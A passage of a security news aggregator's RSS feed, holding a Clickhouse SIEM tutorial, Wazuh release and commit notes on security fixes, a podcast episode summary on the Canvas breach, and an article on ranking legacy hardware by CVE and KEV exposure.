problems, and solutions that work in production.</p><p>If you have questions, found a bug, or want to share an improvement, the comments are open.</p><blockquote><strong><em>Your Turn — Operational Ownership</em></strong></blockquote><blockquote>From here, the real value comes from how you adapt it to your environment. As the operator or administrator, the next layer is yours to build:</blockquote><blockquote><strong><em>Graylog:</em></strong> Create dedicated indexes and streams per data source; build a JSON extractor for the message field to enable structured search.</blockquote><blockquote><strong><em>Vulnerability visibility:</em></strong><em> </em>A custom script can reindex Wazuh’s vulnerability summary index and inject it into Graylog via a new GELF HTTP input — all through the APIs — making vulnerability summaries available in Grafana dashboards .</blockquote><blockquote><strong><em>Alerting and reporting:</em></strong> Define alert conditions and scheduled reports based on what matters to your organization.</blockquote><blockquote><strong><em>Grafana dashboards:</em></strong> Design views tailored to what your team or clients actually need to see.</blockquote><blockquote><strong><em>API automation:</em></strong> Build scripts to automate recurring calls across the stack.</blockquote><blockquote><strong><em>Threat intelligence:</em></strong> Cross-reference events with NIST NVD and CISA KEV for deeper context and custom correlations.</blockquote><blockquote>If you have questions or need guidance on the operational side, feel free to reach out — happy to support within my availability.</blockquote><p><strong>Author:</strong><em> Antonio Valenzuela Serra </em><strong><em>— </em></strong><em>SysAdmin </em><strong><em>— </em></strong><em>Chile </em><strong><em>— </em></strong><em>May 2026\</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=c08d1b412f37" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37">Open Source Security IT Platform: Threat Detection, Logging, Alerts, AI and SSO integration.</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Building a powerful SIEM with Clickhouse and Clickdetect]]></title>
<description><![CDATA[Hi everyone, souzo here. In this blog post I will walk you through building a base SIEM architecture capable of generating security alerts with Clickdetect!This post will not cover how to collect data into Clickhouse. Instead, I will focus on a base table schema for receiving logs and performing ...]]></description>
<link>https://tsecurity.de/de/3525599/hacking/building-a-powerful-siem-with-clickhouse-and-clickdetect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3525599/hacking/building-a-powerful-siem-with-clickhouse-and-clickdetect/</guid>
<pubDate>Mon, 18 May 2026 12:23:40 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone, souzo here. In this blog post I will walk you through building a base SIEM architecture capable of generating security alerts with <a href="https://github.com/clicksiem/clickdetect">Clickdetect</a>!</p><p>This post will not cover how to collect data into Clickhouse. Instead, I will focus on a base table schema for receiving logs and performing detection with Clickdetect.</p><p>In a future post, I will show you how to use Wazuh to send data to any datasource and leverage Clickdetect to power Wazuh detections.</p><a href="https://medium.com/media/4c761497de97041a0ae9f1592397298c/href">https://medium.com/media/4c761497de97041a0ae9f1592397298c/href</a><h3>Why Clickhouse instead ElasticSearch</h3><p>I’m not sponsored by Clickhouse, but I love this database, you can do everything you want and use it in any situation.</p><p>I thought about this many times, and this is why I prefer Clickhouse instead of ElasticSearch for log management.</p><ol><li>Log data is parsed and decoded, so logs can be stored as JSON. Clickhouse is awesome at searching JSON data: <a href="https://clickhouse.com/blog/json-data-type-gets-even-better">look at this post</a>;</li><li>Clickhouse can decrease disk usage by 90% and deliver the same or better performance than Elastic/OpenSearch;</li><li>Clickhouse can perform full-text search and you can create better indexes for logs;</li><li>More control of data. You can do anything in clickhouse and use it for any situation you might have;</li><li>Scalability. Take a look in <a href="https://clickhouse.com/docs/engines/table-engines/special/distributed">distributed table</a>;</li><li>Storage<br>* You can use hybrid storage like Host/Amazon S3 or only Host or S3;<br>* You can encrypt data to be compliance;<br>* Tables in clickhouse are compressed by default.</li><li>SQL ( Do I need to say anything? )</li></ol><h3>Companies that use Clickhouse<a href="https://clickdetect.souzo.me/blog/2026/03/30/building-a-powerful-siem-with-clickhouse-and-clickdetect/#companies-that-use-clickhouse">¶</a></h3><ol><li>Huntress</li><li>RunReveal</li><li>Exabeam</li><li>Fortinet (FortiSIEM)</li><li>Cloudflare</li></ol><h3>Architecture</h3><p>A basic architecture how this will work.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*-HvRu7l8_7s2P-nI.png"><figcaption>Cliockdetect architecture</figcaption></figure><ul><li>Logs are sent by assets to wazuh;</li><li>Wazuh decodes and send parsed logs to Clickhouse;</li><li>Clickdetect will be scheduled to detect and generate alerts;</li><li>Alerts are sent to a webhook.</li></ul><h3>Clickhouse Wazuh Schema</h3><p>This schema is for Wazuh Alerts. In this case, Wazuh is only a log collector — we will only need Wazuh’s decoder capabilities.</p><h4>Database</h4><pre>CREATE DATABASE IF NOT EXISTS siem</pre><h4>Table</h4><pre>CREATE TABLE IF NOT EXISTS siem.wazuh_alerts (<br>    id UUID default generateUUIDv7() CODEC(ZSTD(1)),<br>    timestamp DateTime64(6) DEFAULT now() CODEC(DoubleDelta),<br>    retention UInt16 DEFAULT 30,<br>    tenant LowCardinality(String) CODEC(ZSTD(1)),<br>    rule_id UInt32 CODEC(Delta(8), ZSTD(1)),<br>    rule_description String CODEC(ZSTD(1)),<br>    rule_groups Array(LowCardinality(String)) CODEC(ZSTD(1)),<br>    rule_level UInt8,<br>    agent_id UInt16,<br>    agent_name String CODEC(ZSTD(1)),<br>    manager LowCardinality(String) CODEC(ZSTD(1)),<br>    agent_ip String CODEC(ZSTD(1)),<br>    full_log String CODEC(ZSTD(22)),<br>    message String CODEC(ZSTD(22)),<br>    srcuser String CODEC(ZSTD(1)),<br>    dstuser String CODEC(ZSTD(1)),<br>    srcip String CODEC(ZSTD(1)),<br>    dstip String CODEC(ZSTD(1)),<br>    hostname String CODEC(ZSTD(1)),<br>    location String CODEC(ZSTD(1)),<br>    decoder LowCardinality(String) CODEC(ZSTD(1)),<br>    action LowCardinality(String) CODEC(ZSTD(1)),<br>    protocol LowCardinality(String) CODEC(ZSTD(1)),<br>    status LowCardinality(String) CODEC(ZSTD(1)),<br>    alert JSON CODEC(ZSTD(1)),<br><br>    INDEX idx_full_log full_log TYPE tokenbf_v1(32768, 3, 0) GRANULARITY 1,<br>    INDEX idx_rule_description rule_description TYPE tokenbf_v1(8192, 3, 0) GRANULARITY 1,<br>    INDEX idx_rule_groups rule_groups TYPE bloom_filter(0.01) GRANULARITY 1<br>)<br>engine = MergeTree<br>partition by (toYYYYMMDD(timestamp), tenant)<br>order by (tenant, toUnixTimestamp(timestamp), id)<br>TTL timestamp + toIntervalDay(retention)<br>settings<br>    index_granularity = 4096,<br>    ttl_only_drop_parts = 1,<br>    storage_policy = 'your_s3_policy'</pre><h3>Performing detection with clickdetect</h3><p>To perform detection in clickhouse, we need to create our runner</p><h3>Runner</h3><h4>Define datasource</h4><pre>datasource:<br>    type: clickhouse<br>    host: &lt;clickhouse ip&gt;<br>    port: 8123<br>    verify: false<br>    username: default<br>    password: default<br>    database: siem</pre><h4>Define webhook</h4><pre>webhooks:<br>    webhook_name:<br>        type: generic<br>        url: http://&lt;webhook_host&gt;/</pre><h4>Define detector</h4><pre>detectors:<br>    detector_N:<br>        name: "Detector name"<br>        description: "Detector description"<br>        for: 5m # detector time (s, m, h, d)<br>        rules:<br>            - "detect_test.yml" # you can use * for match directory<br>        data:<br>            var1: "my var"</pre><h4>Rule</h4><pre>id: "00000000-0000-0000-0000-000000000000"<br>name: "Detect all data in clickhouse"<br>level: 1<br>size: "&gt;0"<br>author: <br>    - Vinicius Morais &lt;me@souzo.me&gt;<br>rule: |-<br>    SELECT * FROM wazuh_alerts LIMIT 100;</pre><h4>Clickdetect</h4><p>Run clickdetect with the created runner.yml</p><pre>uv run clickdetect -r runner.yml</pre><h3>Conclusion</h3><p>With just a Clickhouse table, a runner configuration, and a detection rule, you have the foundation of a functional SIEM. This architecture is lightweight, cost-effective, and scales well — whether you’re running it on a single node or a distributed Clickhouse cluster.</p><p>The key advantage over traditional SIEM solutions is control: you own the data, you define the schema, and you write the detections in plain SQL. There are no vendor lock-ins, no per-GB ingestion fees, and no black-box detection engines.</p><p><strong>Rule</strong>: more rules examples you can found <a href="https://github.com/clicksiem/clickdetect/tree/main/example_rules">here</a></p><h3>Next Steps</h3><p>This post covered the base architecture. Here is what comes next:</p><ul><li><strong>Part 2 — Wazuh + Clickdetect</strong>: How to configure Wazuh to forward decoded alerts directly to Clickhouse, and how to write detection rules that leverage Wazuh’s decoded fields.</li><li><strong>Alerting pipelines</strong>: Routing alerts to Slack, PagerDuty, or a ticketing system using Clickdetect webhooks.</li><li><strong>Multi-tenancy</strong>: Using the tenant field to isolate data between clients or business units in a single Clickhouse cluster.</li></ul><p>Follow along on <a href="https://github.com/clicksiem/clickdetect">GitHub</a> and feel free to open issues or contribute detection rules.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=ae68a4495a76" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/building-a-powerful-siem-with-clickhouse-and-clickdetect-ae68a4495a76">Building a powerful SIEM with Clickhouse and Clickdetect</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[coverity-w20-4.14.6: Merge pull request #36060 from wazuh/fix/4791-cluster-path-validation]]></title>
<description><![CDATA[Improve cluster file handling path validation in end_receiving_file]]></description>
<link>https://tsecurity.de/de/3516792/it-security-tools/coverity-w20-4146-merge-pull-request-36060-from-wazuhfix4791-cluster-path-validation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3516792/it-security-tools/coverity-w20-4146-merge-pull-request-36060-from-wazuhfix4791-cluster-path-validation/</guid>
<pubDate>Thu, 14 May 2026 15:05:31 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Improve cluster file handling path validation in end_receiving_file</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v4.10.4-rc1]]></title>
<description><![CDATA[Manager
Changed

Masked authd.pass in configuration API responses for users without update permissions. (#34128)

Fixed

Fixed analysisd plugin decoder argument alignment. (#35222)
Fixed path traversal in authd via agent group name validation. (#35258)
Hardened cluster deserialization by restrict...]]></description>
<link>https://tsecurity.de/de/3516545/it-security-tools/wazuh-v4104-rc1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3516545/it-security-tools/wazuh-v4104-rc1/</guid>
<pubDate>Thu, 14 May 2026 13:34:56 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Manager</h2>
<h3>Changed</h3>
<ul>
<li>Masked <code>authd.pass</code> in configuration API responses for users without update permissions. (<a href="https://github.com/wazuh/wazuh/pull/34128" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34128/hovercard">#34128</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed analysisd plugin decoder argument alignment. (<a href="https://github.com/wazuh/wazuh/pull/35222" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35222/hovercard">#35222</a>)</li>
<li>Fixed path traversal in authd via agent group name validation. (<a href="https://github.com/wazuh/wazuh/pull/35258" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35258/hovercard">#35258</a>)</li>
<li>Hardened cluster deserialization by restricting callable decoding to Wazuh modules and improving error handling. (<a href="https://github.com/wazuh/wazuh/pull/35256" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35256/hovercard">#35256</a>)</li>
<li>Fixed DAPI callable resolution to restrict invocations to exposed resources only. (<a href="https://github.com/wazuh/wazuh/pull/35256" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35256/hovercard">#35256</a>)</li>
<li>Fixed admin protection in update user endpoint. (<a href="https://github.com/wazuh/wazuh/pull/35469" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35469/hovercard">#35469</a>)</li>
<li>Fixed protected settings checks when multiple <code>&lt;ossec_config&gt;</code> blocks are present. (<a href="https://github.com/wazuh/wazuh/pull/34690" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34690/hovercard">#34690</a>)</li>
<li>Restricted cluster file transfer write paths. (<a href="https://github.com/wazuh/wazuh/pull/34659" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34659/hovercard">#34659</a>)</li>
<li>Improved cluster file synchronization path handling by adding safe path joins. (<a href="https://github.com/wazuh/wazuh/pull/35008" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35008/hovercard">#35008</a>)</li>
<li>Fixed Vulnerability Detector offset DB update to occur only after processing (backport from 4.12.0). (<a href="https://github.com/wazuh/wazuh/pull/31901" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31901/hovercard">#31901</a>)</li>
</ul>
<h2>Agent</h2>
<h3>Added</h3>
<ul>
<li>Added detection of the <code>-a never,task</code> Audit rule in FIM whodata for Linux. (<a href="https://github.com/wazuh/wazuh/pull/34661" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34661/hovercard">#34661</a>)</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed sync primitive disposal to stop and soften teardown failures. (<a href="https://github.com/wazuh/wazuh/pull/34680" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34680/hovercard">#34680</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed Windows FIM Registry scan crash on non-null-terminated values. (<a href="https://github.com/wazuh/wazuh/pull/34679" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34679/hovercard">#34679</a>)</li>
</ul>
<h2>Other</h2>
<h3>Changed</h3>
<ul>
<li>Updated curl dependency to 8.12.1. (<a href="https://github.com/wazuh/wazuh/pull/34687" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34687/hovercard">#34687</a>)</li>
<li>Updated <code>starlette</code> dependency to 0.49.1. (<a href="https://github.com/wazuh/wazuh/pull/33383" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33383/hovercard">#33383</a>)</li>
<li>Upgraded Python embedded interpreter to 3.10.19. (<a href="https://github.com/wazuh/wazuh/pull/32790" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/32790/hovercard">#32790</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Canvas / Instructure Breach – 2026-05-11 – BHIS - Talkin' Bout [infosec] News]]></title>
<description><![CDATA[Author: Black Hills Information Security - Bewertung: 1x - Views:11 Join us LIVE on Mondays, 4:30pm EST.
A weekly Podcast with BHIS and Friends. We discuss notable Infosec, and infosec-adjacent news stories gathered by our community news team.
https://www.youtube.com/@BlackHillsInformationSecurit...]]></description>
<link>https://tsecurity.de/de/3508826/it-security-video/the-canvas-instructure-breach-2026-05-11-bhis-talkin-bout-infosec-news/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3508826/it-security-video/the-canvas-instructure-breach-2026-05-11-bhis-talkin-bout-infosec-news/</guid>
<pubDate>Tue, 12 May 2026 04:32:54 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hills Information Security - Bewertung: 1x - Views:11 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/OYBZXDWYf7w?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Join us LIVE on Mondays, 4:30pm EST.<br />
A weekly Podcast with BHIS and Friends. We discuss notable Infosec, and infosec-adjacent news stories gathered by our community news team.<br />
https://www.youtube.com/@BlackHillsInformationSecurity ( https://www.youtube.com/@BlackHillsInformationSecurity )<br />
<br />
Chat with us on Discord! -<br />
https://discord.gg/bhis ( https://discord.gg/bhis )<br />
🔴live-chat<br />
<br />
This episode of Talking About News focuses on the reported Canvas/Instructure breach, including discussion around ShinyHunters, transparency concerns, higher education security challenges, and possible attack paths involving phishing and tenant compromise. The team also explores broader cybersecurity trends such as social engineering, ransomware pressure tactics, and the growing role of AI and platform security in modern enterprise environments.<br />
<br />
Chapters<br />
00:00 - PreShow Banter™ — Californian Problems<br />
02:25 - The Canvas / Instructure Breach – 2026-05-11<br />
10:23 - Story # 1: Canvas Breach Disrupts Schools & Colleges Nationwide<br />
13:45 - Story # 1b: Security Incident Update & FAQs<br />
43:14 - Story # 2: Wazuh cluster sync path traversal in decompress_files() enables arbitrary file write and code execution from authenticated cluster peer<br />
47:34 - Story # 3: Google Chrome silently installs a 4 GB AI model on your device without consent.<br />
52:19 - Story # 4: Trellix source code breach claimed by RansomHouse hackers<br />
58:12 - Story # 5: Rose Acre Farms Targeted in Alleged Lynx Ransomware Attack - Cybersecurity<br />
Links<br />
<br />
Story # 1: Canvas Breach Disrupts Schools & Colleges Nationwide ( https://krebsonsecurity.com/2026/05/canvas-breach-disrupts-schools-colleges-nationwide/ )<br />
Story # 1b: Security Incident Update & FAQs ( https://www.instructure.com/incident_update )<br />
Story # 2: Wazuh cluster sync path traversal in decompress_files() enables arbitrary file write and code execution from authenticated cluster peer ( https://github.com/wazuh/wazuh/security/advisories/GHSA-m8rw-v4f6-8787 )<br />
Story # 3: Google Chrome silently installs a 4 GB AI model on your device without consent. ( https://www.thatprivacyguy.com/blog/chrome-silent-nano-install/ )<br />
Story # 4: Trellix source code breach claimed by RansomHouse hackers ( https://www.bleepingcomputer.com/news/security/trellix-source-code-breach-claimed-by-ransomhouse-hackers/ )<br />
Story # 5: Rose Acre Farms Targeted in Alleged Lynx Ransomware Attack - Cybersecurity ( https://dailysecurityreview.com/cyber-security/rose-acre-farms-targeted-in-alleged-lynx-ransomware-attack/ )<br />
<br />
Wade's Workshop: Threat Actor Profiling: Know Your Enemy ( https://www.antisyphontraining.com/product/workshop-threat-actor-profiling-know-your-enemy/ )<br />
Alethe Denis' Webcast: How to Build a Bulletproof Pretext ( https://events.zoom.us/ev/Ak0QfH-0slzbUnzlPw33H16OpgN5Yz8AJ2MekKZtpT0WUMAsXxop~AqwV-XglEw9Gp537Fh_j8XdRCm5tk52OKcMOZiu3GVxowS7KK-crbjh8fQ )<br />
Alethe Denis' Workshop: How to Build Pressure-Proof Pretexts ( https://www.antisyphontraining.com/product/workshop-how-to-build-pressure-proof-pretexts/ )<br />
<br />
<br />
<br />
🔗 Register for FREE Infosec Webcasts, Anti-casts & Summits https://poweredbybhis.com ( https://poweredbybhis.com/ )<br />
Brought to you by:Black Hills Information Security https://www.blackhillsinfosec.com ( https://www.blackhillsinfosec.com/ )<br />
Antisyphon Traininghttps://www.antisyphontraining.com/ ( https://www.antisyphontraining.com/ )<br />
Active Countermeasureshttps://www.activecountermeasures.com ( https://www.activecountermeasures.com/ )<br />
Wild West Hackin Festhttps://wildwesthackinfest.com ( https://wildwesthackinfest.com/ )<br />
<br />
Talkin' Bout [Infosec] News<br />
Episode 19, Season 6<br />
May 12, 2026<br />
<br />
★ Episode details: https://share.transistor.fm/s/a6d8bc43<br />
<br />
★ Additional episodes: https://bhisnews.transistor.fm<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[coverity-w19-4.14.6: Merge pull request #35866 from wazuh/fix/4713-api-log]]></title>
<description><![CDATA[Validate user name in API]]></description>
<link>https://tsecurity.de/de/3499780/it-security-tools/coverity-w19-4146-merge-pull-request-35866-from-wazuhfix4713-api-log/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3499780/it-security-tools/coverity-w19-4146-merge-pull-request-35866-from-wazuhfix4713-api-log/</guid>
<pubDate>Fri, 08 May 2026 17:52:07 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Validate user name in API</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your refresh plan has a CVE blind spot]]></title>
<description><![CDATA[The conversation is straightforward, but the problem behind it is not. The customer bought servers in 2017 and typically refresh every five to six years. Generally, around the 2022 to 2023 timeframe, they would have looked to buy new.



Historically, that is what would have happened. But COVID h...]]></description>
<link>https://tsecurity.de/de/3498662/it-security-nachrichten/your-refresh-plan-has-a-cve-blind-spot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3498662/it-security-nachrichten/your-refresh-plan-has-a-cve-blind-spot/</guid>
<pubDate>Fri, 08 May 2026 11:10:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The conversation is straightforward, but the problem behind it is not. The customer bought servers in 2017 and typically refresh every five to six years. Generally, around the 2022 to 2023 timeframe, they would have looked to buy new.</p>



<p>Historically, that is what would have happened. But COVID hit, and there were supply chain constraints during COVID. The original end-of-life notice that would have landed around 2023 was extended: 2026 for general software updates and 2028 for security vulnerabilities.</p>



<p>That gave the customer roughly ten years of life on that server platform, which means middle school is right around the corner for this little guy, and this is a healthcare environment.</p>



<p>As soon as COVID let up, they should have refreshed then. They did not. Fast forward to the present, they asked us to walk through a design and bill of materials, and now we are in the middle of an unprecedented supply chain constraint, where we cannot get equipment to them because of what’s happening with AI chip manufacturing and hyperscalers.</p>



<p>It was going to take eight to ten months. On top of that, cost was more than it would have been last year because COGS have increased tremendously.</p>



<p>That puts them in a position where buying new is outside their budget. But even if they could afford it, they still would not get equipment for maybe a year. Then they would have to work through actual deployment and migration. That puts them close to 2028 when security vulnerability support ends, while certainly pushing them beyond 2026 for general software updates.</p>



<p>That is not even counting operating system support lagging on these servers because of their age. Later versions of VMware are not supported, including VCF 9, and Broadcom is strongly encouraging customers to make the move. So, they are between a rock and a hard place with no clean options.</p>



<p>The CTO asked, “What are we supposed to do? I can’t believe you are doing this to us.”</p>



<p>More than anything, I want to help them. But there is nothing we can do to help them in the way they want to be helped.</p>



<p>We talk a lot about how age is not a good proxy for risk, and that is true. So now we are trying to go through and de-risk where we can and look for vulnerabilities that we can patch. Then there are the things we cannot patch or cannot do anything with. For those, we must explore options like purchasing new or bridging to cloud when we cannot get new hardware in time and compliance requirements allow.</p>



<p>It puts the customer in a hard position, and there are no clean answers for that. So, if there is no clean answer, the next best move is to reduce uncertainty.</p>



<h2 class="wp-block-heading">Build the inventory and map the exposure</h2>



<p>Reality is, you cannot assess risk if you do not know your assets, and most CMDBs have gaps.</p>



<p>How you get that inventory depends on what you already have. If you are using a vulnerability scanner like Nessus, Qualys or Rapid7, you likely have this data. Export it to a CSV, and now you are half done with the assessment.</p>



<p>If you do not have a scanner, <a href="https://greenbone.github.io/docs/latest/">Greenbone OpenVAS</a> is free, open source and runs in Docker or on a VM. One scan gives you host platforms, mapped CVEs with severity scores and a structured output.</p>



<p>If you prefer something a little lighter, <a href="https://nmap.org/download.html">Nmap</a> is still the standard. You want to run it with service version detection and XML output against your own network ranges. That way you get active host IP addresses, open ports and service banners.</p>



<p><a href="https://www.runzero.com/platform/community-edition/">runZero</a> offers a free tier and generally handles device fingerprinting better than Nmap, especially for things like network appliances and storage controllers.</p>



<p>Any of these paths gets you to the same place: structured inventory, hostnames, platforms, versions and enough detail to look up what is vulnerable.</p>



<p>Now, end of life is when the vendor stops selling a product. End of support is when the vendor stops issuing things like security patches. That is the date that determines your exposure. Once a platform crosses that line, the CVE list grows permanently and the patch list stops.</p>



<p>There is a <a href="https://endoflife.date/">free resource</a>, endoflife.date. It’s a community-maintained database covering hundreds of platforms with lifecycle dates and a public API. For anything else, check vendor lifecycle pages.</p>



<p>The output is your inventory with end-of-support dates attached and a flag on every asset that has crossed its support boundary.</p>



<p>For every flagged asset, the next step is finding out what is truly exploitable. You can have a software version that is included in a CVE, but it’s been hardened by the OEM and not actually exploitable.</p>



<p>If you are working from Nmap or doing a manual inventory, there are two databases you need to know about: <a href="https://nvd.nist.gov/">NIST’s National Vulnerability Database</a> and <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA’s Known Exploited Vulnerabilities catalog</a>.</p>



<p>The difference between a system with 40 CVEs and no KEV entries versus a system with 12 CVEs and 3 KEV entries is the difference between manageable risk and active danger. Equipment age does not tell you which one you are looking at, which is why we need the CVE profile.</p>



<h2 class="wp-block-heading">Find it, score it, fix it</h2>



<p>Now we use a weighted formula to score every asset.</p>



<p>The formula I use is KEV count times 20, plus highest CVSS times 4, plus months past end of support, plus bonuses for high data sensitivity, internet-facing exposure and assets that cannot be upgraded to post-quantum cryptographic standards. Adjust the weights to your organization’s risk appetite.</p>



<p>This approach aligns with <a href="https://www.cisa.gov/stakeholder-specific-vulnerability-categorization-ssvc">CISA’s Stakeholder-Specific Vulnerability Categorization framework</a>, which prioritizes exploitation status and mission context above overall severity scores. The specific weights are tunable. The principle that KEV entries outweigh CVSS severity and CVSS outweighs age, is the part that stays consistent.</p>



<p>The age-based queue had them backwards. The risk-based queue puts them in the right order and into three buckets.</p>



<ol class="wp-block-list">
<li><strong>Tier 1: immediate action required.</strong> These are assets past end-of-support with KEV catalog entries, especially in regulated environments or handling sensitive data. These have known and actively exploited vulnerabilities with no patches coming. In most regulatory frameworks, defending a risk acceptance position on these without compensating controls like network segmentation, WAF or IDS is difficult and must include remediation on a defined timeline.</li>



<li><strong>Tier 2: managed risk with documentation.</strong> These are assets past end-of-support with CVE counts but no current KEV entries, or assets approaching end-of-support within 12 months. Document the risk acceptance position: who signed off, under what conditions and for how long. The absence of that documentation is itself a finding in most compliance frameworks.</li>



<li><strong>Tier 3: monitored.</strong> This is everything still within their support window, receiving patches, with manageable profiles. These belong in the planning timeline with no immediate action. The key here is ensuring their end-of-support dates are visible in the infrastructure calendar to avoid them becoming Tier One assets through inattention.</li>
</ol>



<p>Last layer, NIST finalized <a href="https://www.nist.gov/news-events/news/2024/08/nist-releases-first-3-finalized-post-quantum-encryption-standards">post-quantum cryptographic standards</a> in 2024, and not all legacy hardware can support the new algorithms. Some replacements will be driven by cryptographic migration requirements independent of the CVE profile.</p>



<p>Do not skip post-quantum. Harvest now, decrypt later is real.</p>



<h2 class="wp-block-heading">What you walk away with</h2>



<p>Once you complete the assessment, you are left with three things that change the planning conversation.</p>



<p>First, you have a prioritized refresh queue that is sequenced by risk rather than age. That answers the question of where we spend first, and that is defensible analysis.</p>



<p>Second, you get a documented risk acceptance position for everything you are choosing not to refresh right now. This is the compliance instrument most organizations are missing. It names the asset, the exposure profile, the business justification and who signed off.</p>



<p>Third, you get a refresh sequence that auditors, leadership and your own team can defend. At some point, a CISO, board member or auditor will ask why a particular system was still running. The answer cannot be, “Well, it’s not in middle school yet.” The answer is documented, it is risk-informed and it is tied back to real data.</p>



<p>If you want the refresh queue to stay current as new CVEs and vulnerabilities are discovered, you can deploy a platform like <a href="https://documentation.wazuh.com/current/installation-guide/index.html">Wazuh</a> that cross-references your assets against CVE databases automatically. Then this one-time assessment becomes a periodic process that is fed by that ongoing stream.</p>



<p>Today, you walk away with a starting point that any team can execute without external consultants or significant budget. Most companies that run through it find at least one piece of the picture they did not have before, and that is usually enough to change the order of the queue.</p>



<p>In an environment where refresh budgets are tight and timelines stretched, the order of the queue matters most.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v4.13.1]]></title>
<description><![CDATA[There are no changes in this release.]]></description>
<link>https://tsecurity.de/de/3487882/it-security-tools/wazuh-v4131/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487882/it-security-tools/wazuh-v4131/</guid>
<pubDate>Tue, 05 May 2026 02:20:42 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>There are no changes in this release.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v4.14.0]]></title>
<description><![CDATA[Manager
Added

Added system users and groups to the inventory data. (#30848)
Added browser extensions and services to the inventory data. (#31614)
Added IPv6 support to Maltiverse integration. (#31731)

Fixed

Fixed internal decoder RC startup. (#29663)
Fixed queue stats RC over wazuh-analysisd. ...]]></description>
<link>https://tsecurity.de/de/3487876/it-security-tools/wazuh-v4140/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487876/it-security-tools/wazuh-v4140/</guid>
<pubDate>Tue, 05 May 2026 02:20:34 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Manager</h2>
<h2>Added</h2>
<ul>
<li>Added system users and groups to the inventory data. (<a href="https://github.com/wazuh/wazuh/pull/30848" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/30848/hovercard">#30848</a>)</li>
<li>Added browser extensions and services to the inventory data. (<a href="https://github.com/wazuh/wazuh/pull/31614" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31614/hovercard">#31614</a>)</li>
<li>Added IPv6 support to Maltiverse integration. (<a href="https://github.com/wazuh/wazuh/pull/31731" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31731/hovercard">#31731</a>)</li>
</ul>
<h2>Fixed</h2>
<ul>
